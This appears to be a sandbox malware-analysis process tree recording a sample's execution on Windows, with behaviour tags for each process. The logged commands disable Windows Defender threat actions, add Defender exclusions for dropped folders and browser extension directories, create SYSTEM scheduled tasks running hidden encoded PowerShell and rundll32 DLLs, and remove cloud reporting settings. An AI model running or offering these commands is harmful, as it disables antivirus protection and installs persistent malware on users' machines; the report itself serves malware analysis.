- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4548
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:2176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4980
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EdkISHpRcryaC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EdkISHpRcryaC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gkfvnfqNCFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gkfvnfqNCFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltepJsludpEU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ltepJsludpEU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vfgYgydlU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vfgYgydlU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cbVeFIwlhYiFKdVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cbVeFIwlhYiFKdVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yqVNydvJdnVKJAcs\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yqVNydvJdnVKJAcs\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3844 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EdkISHpRcryaC" /t REG_DWORD /d 0 /reg:323⤵PID:3124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EdkISHpRcryaC" /t REG_DWORD /d 0 /reg:643⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR" /t REG_DWORD /d 0 /reg:323⤵PID:4316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR" /t REG_DWORD /d 0 /reg:643⤵PID:4444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gkfvnfqNCFUn" /t REG_DWORD /d 0 /reg:323⤵PID:3496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gkfvnfqNCFUn" /t REG_DWORD /d 0 /reg:643⤵PID:3776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltepJsludpEU2" /t REG_DWORD /d 0 /reg:323⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ltepJsludpEU2" /t REG_DWORD /d 0 /reg:643⤵PID:232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vfgYgydlU" /t REG_DWORD /d 0 /reg:323⤵PID:1052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vfgYgydlU" /t REG_DWORD /d 0 /reg:643⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cbVeFIwlhYiFKdVB /t REG_DWORD /d 0 /reg:323⤵PID:4648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cbVeFIwlhYiFKdVB /t REG_DWORD /d 0 /reg:643⤵PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx /t REG_DWORD /d 0 /reg:323⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZUnEyhiGcKQNmzeTx /t REG_DWORD /d 0 /reg:643⤵PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yqVNydvJdnVKJAcs /t REG_DWORD /d 0 /reg:323⤵PID:3448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yqVNydvJdnVKJAcs /t REG_DWORD /d 0 /reg:643⤵PID:3264
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grhGrGLhd" /SC once /ST 05:34:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3024
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grhGrGLhd"2⤵PID:980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grhGrGLhd"2⤵PID:2548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BXhqIicBgbzmzxfzH" /SC once /ST 02:44:19 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe\" JF /ZOsite_idatp 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BXhqIicBgbzmzxfzH"2⤵PID:2192
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EdkISHpRcryaC" /t REG_DWORD /d 0 /reg:321⤵PID:696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4660
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4372
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2300
-
C:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exeC:\Windows\Temp\yqVNydvJdnVKJAcs\WRlCkgsSnJnGvqH\fhOaXjB.exe JF /ZOsite_idatp 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1276 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "buPbzvACkYlCJXJqLy"2⤵PID:3100
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4312
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:208
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4364
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\vfgYgydlU\yUUrdk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "lDXqkgYwthEwqaA" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lDXqkgYwthEwqaA2" /F /xml "C:\Program Files (x86)\vfgYgydlU\GcpcWaX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2436
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "lDXqkgYwthEwqaA"2⤵PID:4380
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lDXqkgYwthEwqaA"2⤵PID:2160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cVsBnLewMFsmWV" /F /xml "C:\Program Files (x86)\ltepJsludpEU2\kbussaB.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2376
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HdbXIkiJRYXma2" /F /xml "C:\ProgramData\cbVeFIwlhYiFKdVB\dPfSVKc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SksuiGojhgncgskmM2" /F /xml "C:\Program Files (x86)\SOIIkoHbmzkeXtHvrDR\ImCwJoi.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3832
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VGEdDPNaoMJJcshJLKu2" /F /xml "C:\Program Files (x86)\EdkISHpRcryaC\yKrOdwz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LziCoayHjbgPwuIox" /SC once /ST 09:08:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yqVNydvJdnVKJAcs\BTvvLXHC\sGFcpld.dll\",#1 /oEsite_idgUE 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "LziCoayHjbgPwuIox"2⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4600
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4224
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4116
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BXhqIicBgbzmzxfzH"2⤵PID:4136
-
-
